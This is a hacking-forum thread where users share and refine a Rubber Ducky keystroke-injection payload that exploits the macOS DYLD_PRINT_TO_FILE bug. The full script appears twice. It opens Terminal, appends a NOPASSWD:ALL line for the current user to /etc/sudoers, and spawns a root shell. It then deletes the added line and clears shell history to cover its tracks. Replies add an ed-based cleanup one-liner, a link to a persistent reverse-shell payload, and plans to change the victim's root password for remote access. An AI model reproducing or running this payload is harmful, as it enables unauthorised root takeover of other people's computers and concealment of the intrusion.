Jump to content

[Payload] [Mac OS X] DYLD_PRINT_TO_FILE Privilege Escalation + cleanup


V3sth4cks153
 Share

Recommended Posts

Hi everyone !

I just saw this on thehackernews.com, and I thought I'd make a Rubber Ducky Payload for it.

This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac. This is just the privilege escalation and the cleanup parts. You can put anything you want root to do in between. The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app.
I've successfully tested this on an Early 2013 MacBook Pro Retina 15'' running OS X 10.10.3 Yosemite.
NOTE: Since the payload uses the username of the victim, I had to make it delete a bit more than the exact length of the added text in the sudoers file (the exploit command adds this to the sudoers file, located at /etc/sudoers : "username ALL=(ALL) NOPASSWD:ALL"). This shouldn't be a problem because the last few lines are commented out. Also having a super, super long username, like 30ish characters (which I dont event know if it's possible) can be a problem. If ever you need it, here is the default sudoers file for Mac OS X 10.10 Yosemite.
Hope you like it !
********************* USE THIS PAYLOAD AT YOUR OWN RISK ! *********************

Here is the code:

REM Author: V3sth4cks153
REM Title: DYLD_PRINT_TO_FILE Privilege Escalation + cleanup
REM This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac.
REM This is just the privilege escalation and the cleanup parts. You can put anything you want root to do in between.
REM The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app.
REM
REM ********************* USE THIS AT YOUR OWN RISK *********************
REM
REM --------------- OPEN TERMINAL ---------------
GUI SPACE
DELAY 100
STRING Terminal
DELAY 500
ENTER
DELAY 1000
REM --------------- GO TO HOME DIRECTORY ---------------
STRING cd
ENTER
DELAY 100
REM --------------- ESCALATE PRIVS ---------------
STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
ENTER 
REM *                                                                                       *
REM ********************* YOU CAN PUT ANYTHING YOU WANT ROOT TO DO HERE *********************
REM *                                                                                       *
REM --------------- CLEANUP ---------------
STRING cd
ENTER
STRING visudo -f /etc/sudoers
ENTER
DOWNARROW
REPEAT 50
RIGHTARROW
REPEAT 40
STRING i
RIGHTARROW
BACKSPACE
REPEAT 35
ESC
STRING :w
ENTER
STRING :x
ENTER
STRING history -c
ENTER
DELAY 100
STRING exit
ENTER
STRING history -c
ENTER
GUI q
Edited by V3sth4cks153
Link to comment
Share on other sites

Nice! The only thing I'd change is your cleanup operation. Depending on how long someones username is it could overwrite and erase other parts of the sudoers file. I'd suggest using nano the CTRL-k to cut the whole line out instead of worrying about removing a certain number of chars.

Other than that, its a nice implementation. Lets see how long it takes Apple to push out a patch?

Link to comment
Share on other sites

Nice! The only thing I'd change is your cleanup operation. Depending on how long someones username is it could overwrite and erase other parts of the sudoers file. I'd suggest using nano the CTRL-k to cut the whole line out instead of worrying about removing a certain number of chars.

Other than that, its a nice implementation. Lets see how long it takes Apple to push out a patch?

Thanks ! I'm glad you like it !

You're right about the cleanup operation. The only problem I had is you can't edit the sudoers file with any editor other than visudo, which is basically VIM. I just found out today that by using the ":$d" command in visudo you could delete the last line. It is better in every way as the payload is then smaller, so faster !

I'm currently working on an application of this exploit, which uploads a text file containing the ip of the victim, and then changes the root password tom anything you want so that you can ssh/sftp to the victim ! I'll post it on the forums when it's done.

DONE !

As for Apple, like it's said in the article, they generally don't patch current versions of their OS, but they include a fix in the next version instead. Which I hope they won't do this time since this is far more dangerous than just making your iPhone reboot !

Here is the modified code (It's also on my GitHub) :

REM Author: V3sth4cks153
REM Title: DYLD_PRINT_TO_FILE Privilege Escalation + cleanup
REM This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac.
REM This is just the privilege escalation and the cleanup parts. You can put anything you want root to do in between.
REM The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app.
REM
REM ********************* USE THIS AT YOUR OWN RISK *********************
REM
REM --------------- OPEN TERMINAL ---------------
GUI SPACE
DELAY 100
STRING Terminal
DELAY 500
ENTER
DELAY 1000
REM --------------- GO TO HOME DIRECTORY ---------------
STRING cd
ENTER
DELAY 100
REM --------------- ESCALATE PRIVS ---------------
STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
ENTER 
REM *                                                                                       *
REM ********************* YOU CAN PUT ANYTHING YOU WANT ROOT TO DO HERE *********************
REM *                                                                                       *
REM --------------- CLEANUP ---------------
STRING cd
ENTER
STRING visudo -f /etc/sudoers
ENTER
DELAY 500
STRING :$d
ENTER
STRING :w
ENTER
STRING :x
ENTER
STRING history -c
ENTER
DELAY 100
STRING exit
ENTER
STRING history -c
ENTER
GUI q
Edited by V3sth4cks153
Link to comment
Share on other sites

Oh, I see what you mean! That is much nicer than using nano. (I've never had any trouble using nano to edit /etc/sudoers as I sudo'd it first?) I've never really been able to get along with vi.

Apple are still likely to be pretty slow at patching this. If it was a serious RCE then we might see a different reaction, but in the real world, people are so precious of their Macs that its gonna be so hard to get the physical access to a machine that you need to exploit this. (Thats Apple's justification, anyway!).

Link to comment
Share on other sites

Oh, I see what you mean! That is much nicer than using nano. (I've never had any trouble using nano to edit /etc/sudoers as I sudo'd it first?) I've never really been able to get along with vi.

Apple are still likely to be pretty slow at patching this. If it was a serious RCE then we might see a different reaction, but in the real world, people are so precious of their Macs that its gonna be so hard to get the physical access to a machine that you need to exploit this. (Thats Apple's justification, anyway!).

It is indeed ! I personally also prefer nano, but then I saw this text in the sudoers file which convinced me there must be a reason why Apple says to use visudo.

# sudoers file.
#
# This file MUST be edited with the 'visudo' command as root.
# Failure to use 'visudo' may result in syntax or file permission errors
# that prevent sudo from running.
#

I also think Apple will likely be slow at patching this. But by searching for "DYLD_PRINT_TO_FILE post module" on Google, I found this which pretty much means that if an attacker has user-level control of your Mac already, he can use this module to take full control of the machine, even without physical access ! But since it's already been 5 days since this has been discovered, I find it really unlikely that Apple will release a patch.

Edited by V3sth4cks153
Link to comment
Share on other sites

  • 2 weeks later...

This vulnerability is great!

I've just created a payload for a persistent reverse bash in OS X using it:

https://forums.hak5.org/index.php?/topic/36390-payload-mac-os-x-simple-persistent-reverse-bash/

About visudo:

I've been testing a little, and it seems that nothing happens if you directly edit «/etc/sudoers», so what my script does is, once the payload was executed, just delete the last line of the file like this:

REM --------------- SET PRIVILEGES BACK TO NORMAL ---------------
STRING echo -e '$d\nw\nq'| ed /etc/sudoers
ENTER
DELAY 200

I tested this in my own Mac and it works ok. It's way simpler and faster than using visudo.

Hope it helps!

Link to comment
Share on other sites

This vulnerability is great!

I've just created a payload for a persistent reverse bash in OS X using it:

https://forums.hak5.org/index.php?/topic/36390-payload-mac-os-x-simple-persistent-reverse-bash/

About visudo:

I've been testing a little, and it seems that nothing happens if you directly edit «/etc/sudoers», so what my script does is, once the payload was executed, just delete the last line of the file like this:

REM --------------- SET PRIVILEGES BACK TO NORMAL ---------------STRING echo -e '$d\nw\nq'| ed /etc/sudoersENTERDELAY 200
I tested this in my own Mac and it works ok. It's way simpler and faster than using visudo.

Hope it helps!

Hi. That's really cool !

It's even better than the ":$d" command in visudo ! Being a bit of a bash beginner, I didn't even think about not opening the file in the first place... I'll test it on my computer when I'm back home from holidays.

Edited by V3sth4cks153
Link to comment
Share on other sites

To disable it you just should run:

sudo crontab -e
In the victim's computer. This will open a text editor and you just have to remove only the last line which is the one that the script created. Then save and you're done.

Ok great ! Thanks ! I'll give me feedback as soon as I get a chance to test it.

Link to comment
Share on other sites

  • 3 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...